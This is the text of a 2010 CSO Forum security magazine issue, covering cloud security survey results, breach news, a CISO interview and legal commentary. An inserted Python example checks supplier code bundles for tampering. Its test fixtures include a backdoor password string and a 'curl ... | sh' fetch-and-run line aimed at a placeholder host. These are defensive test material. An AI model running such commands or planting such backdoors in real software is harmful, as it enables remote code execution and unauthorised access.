Security For Growth And Governance
June | 21 | 2010 Volume 01 | Issue 03
SECURITY REPORT The CSO FORUM CLOUD SECURITY SURVEY 2010 looks into user confidence levels and concerns of CISOs across the region. PAGE 05
IN-SHORT
Code Security
Best Practices PAGE 02
IN-PERSON
Protect Infosec
Assets, Always
PAGE 04
A 9.9 Media Publication
OPINION
Cost of
Insecurity PAGE 07
IN-DEPTH
EDITORIAL
ANURADHA DAS MATHUR | editor@csoforum.in
Walking securely in the Cloud... will CISOs lead the way?

At the recently concluded CSO Forum's Advisory Council meeting, I was pleasantly surprised. Contrary to popular perceptions, India's leading CISOs sounded completely convinced of the need to move to the cloud. The economics of it is compelling and the focus, in their minds, is to ensure a safe and secure migration, as opposed to a 'whether or not' decision. This is in sharp contrast to 18 months ago, when at similar forums the paranoia around the security of the cloud was overwhelming enough to dwarf the economics!

Cloud service providers still seem to be focusing on the CFO community to get their buy-in. It seems to me that they must start from the belief that the economic advantages of moving to the cloud are evident, and therefore the issue is to demonstrate a secure migration together with water-tight legalities. Post the decision to migrate, the key concern is still very much around security and compliance. This means co-opting the CISO and the legal heads of enterprises as opposed to just the CFO.

Beyond the broad 'whether or not' debate is a slew of questions around which type of cloud: public, private, hybrid or community. Each has different implications for security and costs, and organisations need to make their choices based on their specific needs; there is no 'one size fits all' answer. Their decision is equally guided by the quality and the competence of the cloud service provider. The CISO community predicts vast improvements in the offerings of cloud vendors in the foreseeable future.

While business-savvy CISOs believe they must demonstrate the RoI for security investments, there are many who are comfortable trading off some costs for greater security, for instance by choosing a private cloud. And to their advantage, currently the security mindset is such that they are likely to be heard... As I said, decision-making is coming of age, where corporate functions are aligned to derive maximum business benefit without risking the enterprise unduly... In terms of the cloud, CISOs have their place under the sun!

We are embarking on further research relating to the security of the cloud and I will keep you posted. In the meantime, please do share your thoughts and feedback... Stay safe.
VOLUME 01 | ISSUE 03 | 21 JUNE 2010 Managing Director: Dr Pramath Raj Sinha Printer & Publisher: Kanak Ghosh Publishing Director: Anuradha Das Mathur EDITORIAL Editor-in-chief: Rahul Neel Mani Editor (Online): Geetaj Channana Associate Editor: Dominic K Resident Editor (West & South): Ashwani Mishra Assistant Editor: Aditya Kelekar Principal Correspondent: Vinita Gupta Correspondent: Sana Khan DESIGN Sr. Creative Director: Jayan K Narayanan Art Director: Binesh Sreedharan Associate Art Director: Anil VK Manager Design: Chander Shekhar Sr. Visualisers: PC Anoop, Santosh Kushwaha Sr. Designers: Prasanth TR, Anil T & Suresh Kumar Designer: Sristi Maurya Chief Photographer: Subhojit Paul Photographer: Jiten Gandhi ADVISORY BOARD Arup Chatterjee, CISO, WNS Global Services (P) Ltd Burgess Cooper, Head, IT Security, Vodafone Essar Limited Felix Mohan, CISO, Bharti Airtel Limited Japjit S Sandhu, VP & Head IT, VFS Global KR Krishnakumar, Group CISO, Aditya Birla Group Murli Nambiar, VP, Information Security, Reliance Capital Pradeep Sekar, Senior VP & Head IS, Citi India, Srilanka & Bangladesh Prof. Ponnurangam, Professor IIITD Raghu Raman, CEO, National Intelligence Grid Satish Warrier, Associate VP, IS, Godrej Industries Sunil Dhaka, CISO, ICICI Bank Ltd. Vishal Salvi, Senior VP & CISO, HDFC Bank SALES & MARKETING VP Sales & Marketing: Naveen Chand Singh National Manager-Events and Special Projects: Mahantesh Godi (09880436623) Product Manager: Rachit Kinger Asst. Brand Manager: Arpita Ganguli GM South: Vinodh K (09740714817) Senior Manager Sales (South): Ashish Kumar Singh GM North: Lalit Arun (09582262959) GM West: Sachin Mhashilkar (09920348755) Kolkata: Jayanta Bhattacharya (09331829284) PRODUCTION & LOGISTICS Sr. GM. Operations: Shivshankar M Hiremath Production Executive: Vilas Mhatre Logistics: MP Singh, Mohd. 
Ansari, Shashi Shekhar Singh OFFICE ADDRESS Nine Dot Nine Interactive Pvt Ltd C/o K.P.T House,Plot 41/13, Sector-30, Vashi, Navi Mumbai-400703 India Printed and published by Kanak Ghosh for Nine Dot Nine Interactive Pvt Ltd C/o K.P.T House, Plot 41/13, Sector-30, Vashi, Navi Mumbai-400703 India Editor: Anuradha Das Mathur C/o K.P.T House, Plot 41/13, Sector-30, Vashi, Navi Mumbai-400703 India Printed at Silverpoint Press Pvt. Ltd. D 107,TTC Industrial Area, Nerul.Navi Mumbai 400 706
CSO FORUM 21 JUNE 2010
IN-SHORT

178 Arrested in Card Fraud Raids

In what is being called one of the largest credit card fraud ring busts to date, the Spanish Interior Ministry says police in 12 countries have arrested 178 people suspected of being part of an international crime gang. According to a statement from the Spanish ministry, these arrests resulted from a two-year investigation and included raids in France, Italy, Germany, Ireland, Romania, Australia, Sweden, Greece, Finland, Hungary and the United States, where eight of the suspects were arrested. Police say this alleged gang was involved in credit card fraud, robbery with violence, extortion, sexual exploitation and money laundering. The group is believed to have made more than $24.5 million from its illegal activities. During their raids, police found 11 laboratories for falsifying credit cards, as well as more than 120,000 stolen credit cards and 5,000 cloned cards. "These 178 arrests are significant. The 120,000 stolen cards are significant. These are not the kids who are on YouTube selling card skimmers; this was a group with lots of people involved to accumulate card data."

DATA BRIEFING

52.95%: market share for Internet Explorer, the lowest in a decade.

Code Security

SAFECode report highlights best practices

A NEW report from the Software Assurance Forum for Excellence in Code (SAFECode) sheds new light on how vendors are trying to work more secure coding into the product development process. The vendors contributing to the report are SAFECode members who have enjoyed some success in reducing the frequency of attacks against their technology, including EMC Corp., Juniper Networks, SAP and Microsoft. But the organisation also includes companies that continue to have an uphill climb, most notably Adobe Systems. Despite its efforts to write more ironclad software, Adobe has taken heavy criticism for the number of vulnerabilities attackers have been able to exploit.

The code security trend is reflected in the Rugged Software movement; BSIMM, the Building Security In Maturity Model; Microsoft's Security Development Lifecycle (SDL); the growth of OWASP, the Open Web Application Security Project; and the emergence of new secure application development certifications such as the CSSLP from ISC2.

SAFECode's latest paper deals specifically with this area and represents the first industry-led effort to identify and analyse the software integrity controls used by software vendors to protect software from the insertion of vulnerabilities as it moves along the global supply chain. Among the actions worth pursuing to improve security in the supply chain, SAFECode members recommend:

- Vendor contracts that include stronger language on the responsibilities and expectations of vendors and suppliers. "The written agreement must explicitly state the expectations as well as the consequences of any non-compliance with the terms of the agreement," the report said.
- Vendor technical integrity controls for suppliers that address everything from secure transfer of code and sharing of system and network resources to malware scanning and secure storage.
- More rigorous security testing with static code analysis tools, network and web application vulnerability scanners, binary code analysis tools, malware detection tools that can discover such problems as backdoors, and security compliance validation tools.
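The SAFECode item above lists "secure transfer of code" among the technical integrity controls a vendor should impose on its suppliers, without saying what such a control looks like in practice. The following is an added example, not code from the SAFECode report or from any vendor named in the story: the supplier ships a manifest of SHA-256 digests for every file in a code drop, authenticated with an HMAC under a key the two parties exchanged out of band; the receiver recomputes every digest, flags tampered, missing and unlisted files, and refuses the whole drop if the manifest's HMAC does not verify. The manifest layout, the key, the file names and the sample bundle are all assumptions constructed for this example.

```python
"""Integrity check for a supplier-delivered code bundle (added example).

Not code from the SAFECode report or from any vendor it names. Manifest
layout, shared key and the sample bundle below are constructed assumptions.
"""
import hashlib
import hmac
import json

# Constructed sample drop: three files a supplier might deliver.
SAMPLE_BUNDLE = {
    "README": b"Supplier drop, release 1.2\n",
    "src/Makefile": b"all:\n\tcc -o auth src/auth.c\n",
    "src/auth.c": b"int check(const char *p) { return strcmp(p, expected) == 0; }\n",
}
# Assumed shared secret, exchanged out of band; it never travels with the bundle.
KEY = b"demo-key-exchanged-out-of-band"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _canonical(files: dict) -> bytes:
    # Canonical JSON so supplier and receiver MAC byte-identical input.
    return json.dumps(files, sort_keys=True, separators=(",", ":")).encode()


def build_manifest(bundle: dict, key: bytes) -> dict:
    """Supplier side: digest every file, then MAC the digest table."""
    files = {path: sha256_hex(content) for path, content in bundle.items()}
    tag = hmac.new(key, _canonical(files), hashlib.sha256).hexdigest()
    return {"files": files, "hmac": tag}


def verify_bundle(bundle: dict, manifest: dict, key: bytes) -> dict:
    """Receiver side: returns {"ok": bool, "problems": [...]}.

    The MAC is checked first; a manifest that cannot be authenticated tells
    us nothing about the files, so no per-file result is reported for it.
    """
    expected = hmac.new(key, _canonical(manifest["files"]), hashlib.sha256).hexdigest()
    # compare_digest runs in constant time, so the check is not a timing oracle.
    if not hmac.compare_digest(expected, str(manifest.get("hmac", ""))):
        return {"ok": False, "problems": ["manifest signature invalid"]}
    problems = []
    for path, digest in manifest["files"].items():
        if path not in bundle:
            problems.append("missing: " + path)
        elif not hmac.compare_digest(sha256_hex(bundle[path]), digest):
            problems.append("tampered: " + path)
    for path in bundle:
        if path not in manifest["files"]:
            problems.append("unlisted: " + path)
    return {"ok": not problems, "problems": sorted(problems)}


def run_checks() -> dict:
    """Exercise the verifier against a clean drop and five kinds of interference."""
    manifest = build_manifest(SAMPLE_BUNDLE, KEY)

    tampered = dict(SAMPLE_BUNDLE)  # a backdoor spliced into auth.c in transit
    tampered["src/auth.c"] = SAMPLE_BUNDLE["src/auth.c"].replace(
        b"== 0", b'== 0 || !strcmp(p, "letmein")')

    missing = {p: c for p, c in SAMPLE_BUNDLE.items() if p != "README"}

    unlisted = dict(SAMPLE_BUNDLE)  # an extra file the manifest never vouched for
    unlisted["src/.post-install.sh"] = b"curl http://example.invalid/x | sh\n"

    # Attacker edits the digest table to cover the extra file but cannot re-MAC it.
    forged = {"files": dict(manifest["files"]), "hmac": manifest["hmac"]}
    forged["files"]["src/.post-install.sh"] = sha256_hex(unlisted["src/.post-install.sh"])

    return {
        "clean": verify_bundle(SAMPLE_BUNDLE, manifest, KEY),
        "tampered": verify_bundle(tampered, manifest, KEY),
        "missing": verify_bundle(missing, manifest, KEY),
        "unlisted": verify_bundle(unlisted, manifest, KEY),
        "forged_manifest": verify_bundle(unlisted, forged, KEY),
        "wrong_key": verify_bundle(SAMPLE_BUNDLE, manifest, b"not-the-shared-key"),
    }


if __name__ == "__main__":
    for name, result in run_checks().items():
        print(f"{name:16s} ok={result['ok']} {result['problems']}")
```

Two design points are worth noting. An unkeyed digest list would catch accidental corruption but not a supplier-side or in-transit attacker, who would simply regenerate the list; the MAC ties the list to a key the attacker does not hold. And unlisted files are treated as a failure rather than ignored, because a dropped-in script or binary that the manifest never vouched for is exactly the insertion the SAFECode controls are meant to stop.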
IN-SHORT

US Congress seeks 10 R&D cyber security initiatives

A CYBER SECURITY bill introduced in the Senate last week lists key research and development initiatives the government would back in its quest to secure critical information systems and networks. The Protecting Cyberspace as a National Asset Act of 2010, as the Senate measure is known, lists 10 R&D initiatives:

1. Advance the development and accelerate the deployment of more secure versions of fundamental Internet protocols and architectures, including for the secure domain name addressing system and routing security;
2. Improve and create technologies for detecting and analysing attacks or intrusions, including analysis of malicious software;
3. Improve and create mitigation and recovery methodologies, including techniques for containment of attacks and development of resilient networks and systems;
4. Develop and support infrastructure and tools to support cybersecurity research and development efforts, including modeling, testbeds, and data sets for assessment of new cybersecurity technologies;
5. Assist the development and support of technologies to reduce vulnerabilities in process control systems;
6. Understand human behavioral factors that can affect cybersecurity technology and practices;
7. Test, evaluate and facilitate, with appropriate protections for any proprietary information concerning the technologies, the transfer of technologies associated with the engineering of less vulnerable software and securing the information technology software development lifecycle;
8. Assist the development of identity management and attribution technologies;
9. Assist the development of technologies designed to increase the security and resiliency of telecommunications networks; and
10. Advance the protection of privacy and civil liberties in cybersecurity technology and practices.

The legislation also would provide for government-backed R&D to address other risks identified by the director of the National Center for Cybersecurity and Communications, the Department of Homeland Security unit that would be created by the Senate legislation to oversee federal cybersecurity programs among civilian agencies and departments.

HACKED: iPad 3G Owners' e-mail Addresses Compromised

PROMINENT users of Apple's new iPad 3G, including military and government officials as well as media personalities and celebrities, were among those whose e-mail addresses were exposed by a group that shared its findings with online publication Valleywag to point out security flaws in AT&T's Web servers. The iPad 3G went on sale April 30 in the United States. It uses either Wi-Fi or AT&T's 3G cellular service to connect to the Internet for Web surfing and e-mail. A Wi-Fi only iPad was offered first, in early April. So far, Apple has sold more than 2 million iPads, the company has said. There was no comment from Apple, which earlier this week introduced its next-generation iPhone. Apple wasn't the first to show the new iPhone; gadgets blog Gizmodo was a few months ago when it purchased an iPhone prototype for $5,000. Gizmodo is owned by Gawker Media, the same company that publishes Valleywag.

The ICC ID (integrated circuit card identifier) is a unique identifier tying a device to a wireless subscriber. AT&T said it is "continuing to investigate and will inform all customers whose e-mail addresses and ICC IDs may have been obtained." The group that hacked AT&T's Web servers is called Goatse, which has "previously highlighted real security vulnerabilities in the Firefox and Safari Web browsers, and attracted media attention for finding what it said were flaws in Amazon's community ratings system," Gawker said.

The least expensive iPad 3G model costs $629; the most expensive, $829. AT&T does not require a contract for iPad customers to use its cellular network. For new iPad customers, AT&T's $25, 2-gigabytes-a-month plan replaces the existing $29.99-a-month unlimited plan. There is also a $15 monthly plan for those who use up to 250 megabytes of data.
IN-PERSON

Protect Infosec Assets, Always

Patricia Titus, Chief Information Security Officer, Unisys Federal, spoke to Dominic K on issues related to the protection of critical infrastructure assets of an enterprise.

"Security must be placed in the right part of the organisation or it will fail to get traction."

What is the state of critical infrastructure protection programmes in the United States and how, according to you, should India address the same?

Critical infrastructure programmes in the U.S. are beginning to get more attention when it comes to cyber security protections. While there's still a lot of work to be done, many organisations have begun the arduous task of implementing a risk management programme based on the IT systems. The U.S. Department of Homeland Security has taken steps to start identifying what should be deemed as a critical asset. Since the inception of the programme, the list of critical assets in the National Asset Database is expected to grow exponentially as and when data is collected. Now that the department has identified the assets, the next step is to prioritise them based on criticality factors outlined in the process documentation. I strongly recommend that India begins to take steps such as this to assist in identifying and prioritising critical assets and performing the necessary risk management tasks. From what I recall from my days in India working with the Indian government, much of the critical infrastructure such as airports is government-owned. So it should be easier for the Indian government to collect data on critical assets than it is in America.

Brief us on the trends you observed in the past few years. What should CISOs do?

The threats continue to become more sophisticated and blended in nature. But I also would like to note that many organisations are ignoring some of the most basic security protections. Patch management, anti-virus definitions and other basic security hygiene are being overlooked or simply not done. Conficker is a great example of a very old exploit coming back into the security picture because people ignored it. CISOs need to continue to be diligent with the basics first.

What do you foresee in the coming years considering that threats are blended and getting more complex with every passing day?

The consumerisation of IT and the demands for access to data that accompany that trend mean that we'll continue to see the movement of data to the cloud and to mobile devices. This move will mean security professionals will need to think differently about data protection. Perimeter security on its own will no longer be enough. Security professionals need to identify data types and apply security controls based on data types rather than attempt to protect all of their data in the same way. This will allow a more focused approach to the most critical data types.

What is your experience on cyber war and how has the United States addressed the same?

I strongly believe that there needs to be more international dialogue on what constitutes a cyber war and the associated rules of behaviour. Much the same as the Geneva Convention, we need a convention for cyber war.
COVER STORY

SECURITY REPORT

Information security requires clear assessment of risks, decision-making behaviours and metrics for evaluating business and policy options. The CSO Forum ran a nationwide cloud security survey. Excerpts. By Dominic K

Across nations, cloud computing is a ubiquitous and growing set of extremely efficient, massively scalable multi-tenant data centres offering enterprises an alternative way of building, deploying and selling services at a significantly lower price point. Customers have the option to pay for these services on a pay-as-you-go, usage-based model that ramps as they grow. Key factors leading to low-cost cloud computing can be attributed to:

- Significant advances in data centre management automation.
- Better utilisation of resources through system virtualisation (for servers, network and security).
- Greatly increased data centre density due to multi-core chips and blades.
- Continual reduction in Internet latency and bandwidth costs, which has changed the feasibility of using remote systems.

The CSO Forum conducted a nationwide survey on the state of cloud security across verticals and sectors. 100 key Chief Information Security Officers (CISOs) and Chief Information Officers (CIOs) who held additional responsibilities for enterprise security in their respective organisations participated. The results were interesting to analyse in view of the active participation from the government; many public sector enterprises also responded to the survey. The key findings are mentioned below.

According to the CSO Forum state of enterprise cloud security survey 2010, 55 percent of the respondents are planning to adopt and migrate to one or more cloud computing applications for their enterprise applications. The remaining 45 percent of the CISOs are yet to take a decision on the same (Fig 1). The survey clearly pointed out that most employees (64%) accessed cloud based services only after proper authorisation (Fig 2).

Figure 3 shows the top three business concerns according to our survey in descending order. They are financial stability (84% of respondents feel so), lack of transparency and lack of security professionals (jointly at 82%) and size of the company (at 80%). Technology issues hounding the information security chief are data integrity tampering (felt by 60%) followed by data breach / penetration by black hats (at 56%). The next most important concern is loss of data due to system failure (at 55%) (Fig 4).

The top three legal concerns included ownership of data (50%) followed by issues related to terms of service, a lack of enforceable remedies and compliance, all three tied at second place (30%) (Fig 5). The top three compliance concerns are those related to financial regulations (backed by 53% of respondents) followed by industry specific regulations (52% say so) and compliance with international regulations (claimed by 51% of respondents) (Fig 6).

Figure 1: Do you plan to adopt one or more cloud computing applications within your organisation in the next twelve months? Yes 55%, No 45%.

Figure 2: Did employees begin using cloud based services without proper authorisation? Yes 36%, No 64%.

Figure 3: Top three business concerns (rating score): financial stability 84; lack of transparency 82; lack of security personnel 82; size of company 80. Also rated: lack of process within the company, lack of segregation of duties, no risk management process.

Figure 4: Top three technology concerns (rating score): data integrity tampering 60; hacker/data breach 56; loss of data due to system failure 55. Also rated: business continuity/disaster recovery, interruption of availability.

Figure 5: Top three legal concerns (rating score): ownership of data 50; terms of service 30; lack of enforceable remedies from a breach 30; compliance with industry specific privacy regulations 30. Also rated: discovery issues, exposure or seizure of data by government, cross-country data flow.

Figure 6: Top three compliance concerns (rating score): financial regulations (Sarbanes-Oxley, etc.) 53; industry specific regulations (HIPAA, PCI, etc.) 52; compliance with international regulations over numerous countries 51.
OPINION BY DOMINIC K dominic.k@9dot9.in
THE AUTHOR IS Associate Editor, CSO Forum
The Cost of Being Insecure

GLOBALLY, WHAT do you think the average cost of a data breach is? Guess. The Ponemon Institute did some research and found that it is a staggering 3.43 million USD. This kind of money is just scary. The United States and Germany have laws that make it even harder for malicious hackers and social engineers to do their dirty deeds, yet in both those countries the average costs were higher. Not a small amount either: in Germany it was over 25 percent higher, and in the USA 43 percent higher, than the global average!

There is a mountain of information available on how to protect, how to choose a penetration tester, how to stay protected from hacking attacks, social engineering attacks and even virus attacks. In addition, there are new laws to help protect. Even then, this number continuously increases each year. Why so? One of the reasons we feel this is happening is the lack of good education on security. It seems that nowadays anyone who takes a week-long boot camp and then appears for a certification exam can become a penetration tester. Unleashing this type of pentester on production servers can cause more harm than good.

In one of my recent interactions with Richard Stiennon he discussed what inspired him to write on surviving cyber war. He mentioned that sometime in 2007, post the attacks on Estonia's Internet network, he realised that the hierarchy was actually a timeline. He started to research state-sponsored attacks looking for examples that would meet the criteria for cyber warfare: the combination of network attacks with tanks rolling across borders. On August 8, 2008, Russia sent tanks across the border into South Ossetia while there were simultaneous attacks on Georgian networks. That's when he decided to write a book on surviving cyber war. He picked narrative non-fiction because he had already written over 3,00,000 words on threat chaos and hence wanted to write a book that would have a broad appeal. He also decided not to water down the technical aspects. In his own words: "I would not shy away from technical concepts but would explain them in a way that any regular reader of the New York Times, Wall Street Journal, or any blog could pick up." He also sought to tell the stories of the people involved in conducting cyber research and defence.

The hardest part about writing any book on cyber threats is that they do not stop while you are writing. The infiltration of the Dalai Lama's network (GhostNet), the DDoS attacks on US and South Korean websites of last summer, the USB thumb drive infection in the US and Indian military... all these had to be incorporated as they happened. One month after submitting the manuscript, Google made their announcement that Chinese hackers had targeted their source code and Chinese users. Richard accepted that his biggest worry as he wrote was that an accomplished journalist from the NYT or FT would also attempt to write essentially the same theme of book. Thankfully that did not happen.

Militaries around the world are re-organising around cyber-units, and policy makers are engaging in international summits to discuss the threats and what to do about them. The US Congress is contemplating over 40 separate bills addressing cyber security issues. This is a clear indication for the Indian government and enterprises across verticals and sectors to be proactive. This includes framing and streamlining strict processes and legal guidelines on information security breaches so as to avoid incidents, and with them the colossal cost of being insecure.
OPINION FRANCOISE GILBERT
THE AUTHOR IS Managing Director at IT Law Group and author of Global Privacy & Security Law Treatise
Coming Soon to European Union: Security Breach Disclosure Requirements

A SIGNIFICANT change to the data protection regime in the European Union is in progress. Within the next twelve months, the data protection laws of the Member States of the European Union will be modified to require companies that are subject to the ePrivacy Directive 2002/58/EC, as amended in 2009 by Directive 2009/136/EC, to disclose the occurrence of a breach of security to the appropriate authority, and to the individuals whose personal data are affected by the breach of security.

This change will have a significant effect on the Indian companies that do business with EU-based companies that are subject to the ePrivacy Directive. They should start preparing now for the time when the 2009 amendment to this Directive is implemented in the national laws throughout the European Union. This amendment to the EU national laws will cause certain categories of EU companies to amend their existing contracts and to demand that their Indian service providers accommodate the new requirement for disclosure of a breach of security.

While the new security breach disclosure regime affects only providers of publicly available electronic communications services, it is likely that it will be the foundation for defining a security breach disclosure framework that applies to other personal data holders. The amendments must be implemented in each of the national laws of the Member States of the European Union and the European Economic Area by June 2011.

The new Article 4(1a) directs that the security measures must:

- Ensure that personal data can be accessed only by authorised personnel for legally authorised purposes;
- Protect personal data stored or transmitted against accidental or unlawful destruction, accidental loss or alteration, and unauthorised or unlawful storage, processing, access or disclosure; and
- Ensure the implementation of a security policy with respect to the processing of personal data.

In addition, the 2009 amendment grants the relevant national authorities the ability to audit the measures taken by providers of publicly available electronic communications services and to issue recommendations about best practices concerning the level of security that these measures should achieve.

The concept of disclosure of a breach of security already existed in the 2002 version of the ePrivacy Directive. Under Article 4(2) of the ePrivacy Directive, Member States' national laws must require providers of publicly available electronic communications services to inform subscribers of any special risks of a breach of the security of the network. Such risks may occur for electronic communications services over an open network such as the Internet or analogue mobile telephony.

Indian companies that do business with European Union companies that are subject to the ePrivacy Directive should start preparing for the time when the 2009 amendment to the Directive is implemented in the national laws of the EU Member States. These clients will promptly require amendments of their existing contracts to oblige their Indian service providers to accommodate the requirement for disclosure of a breach of security. These additional obligations will likely create significant additional costs and legal liability. It is important to prepare a budget for these costs ahead of time.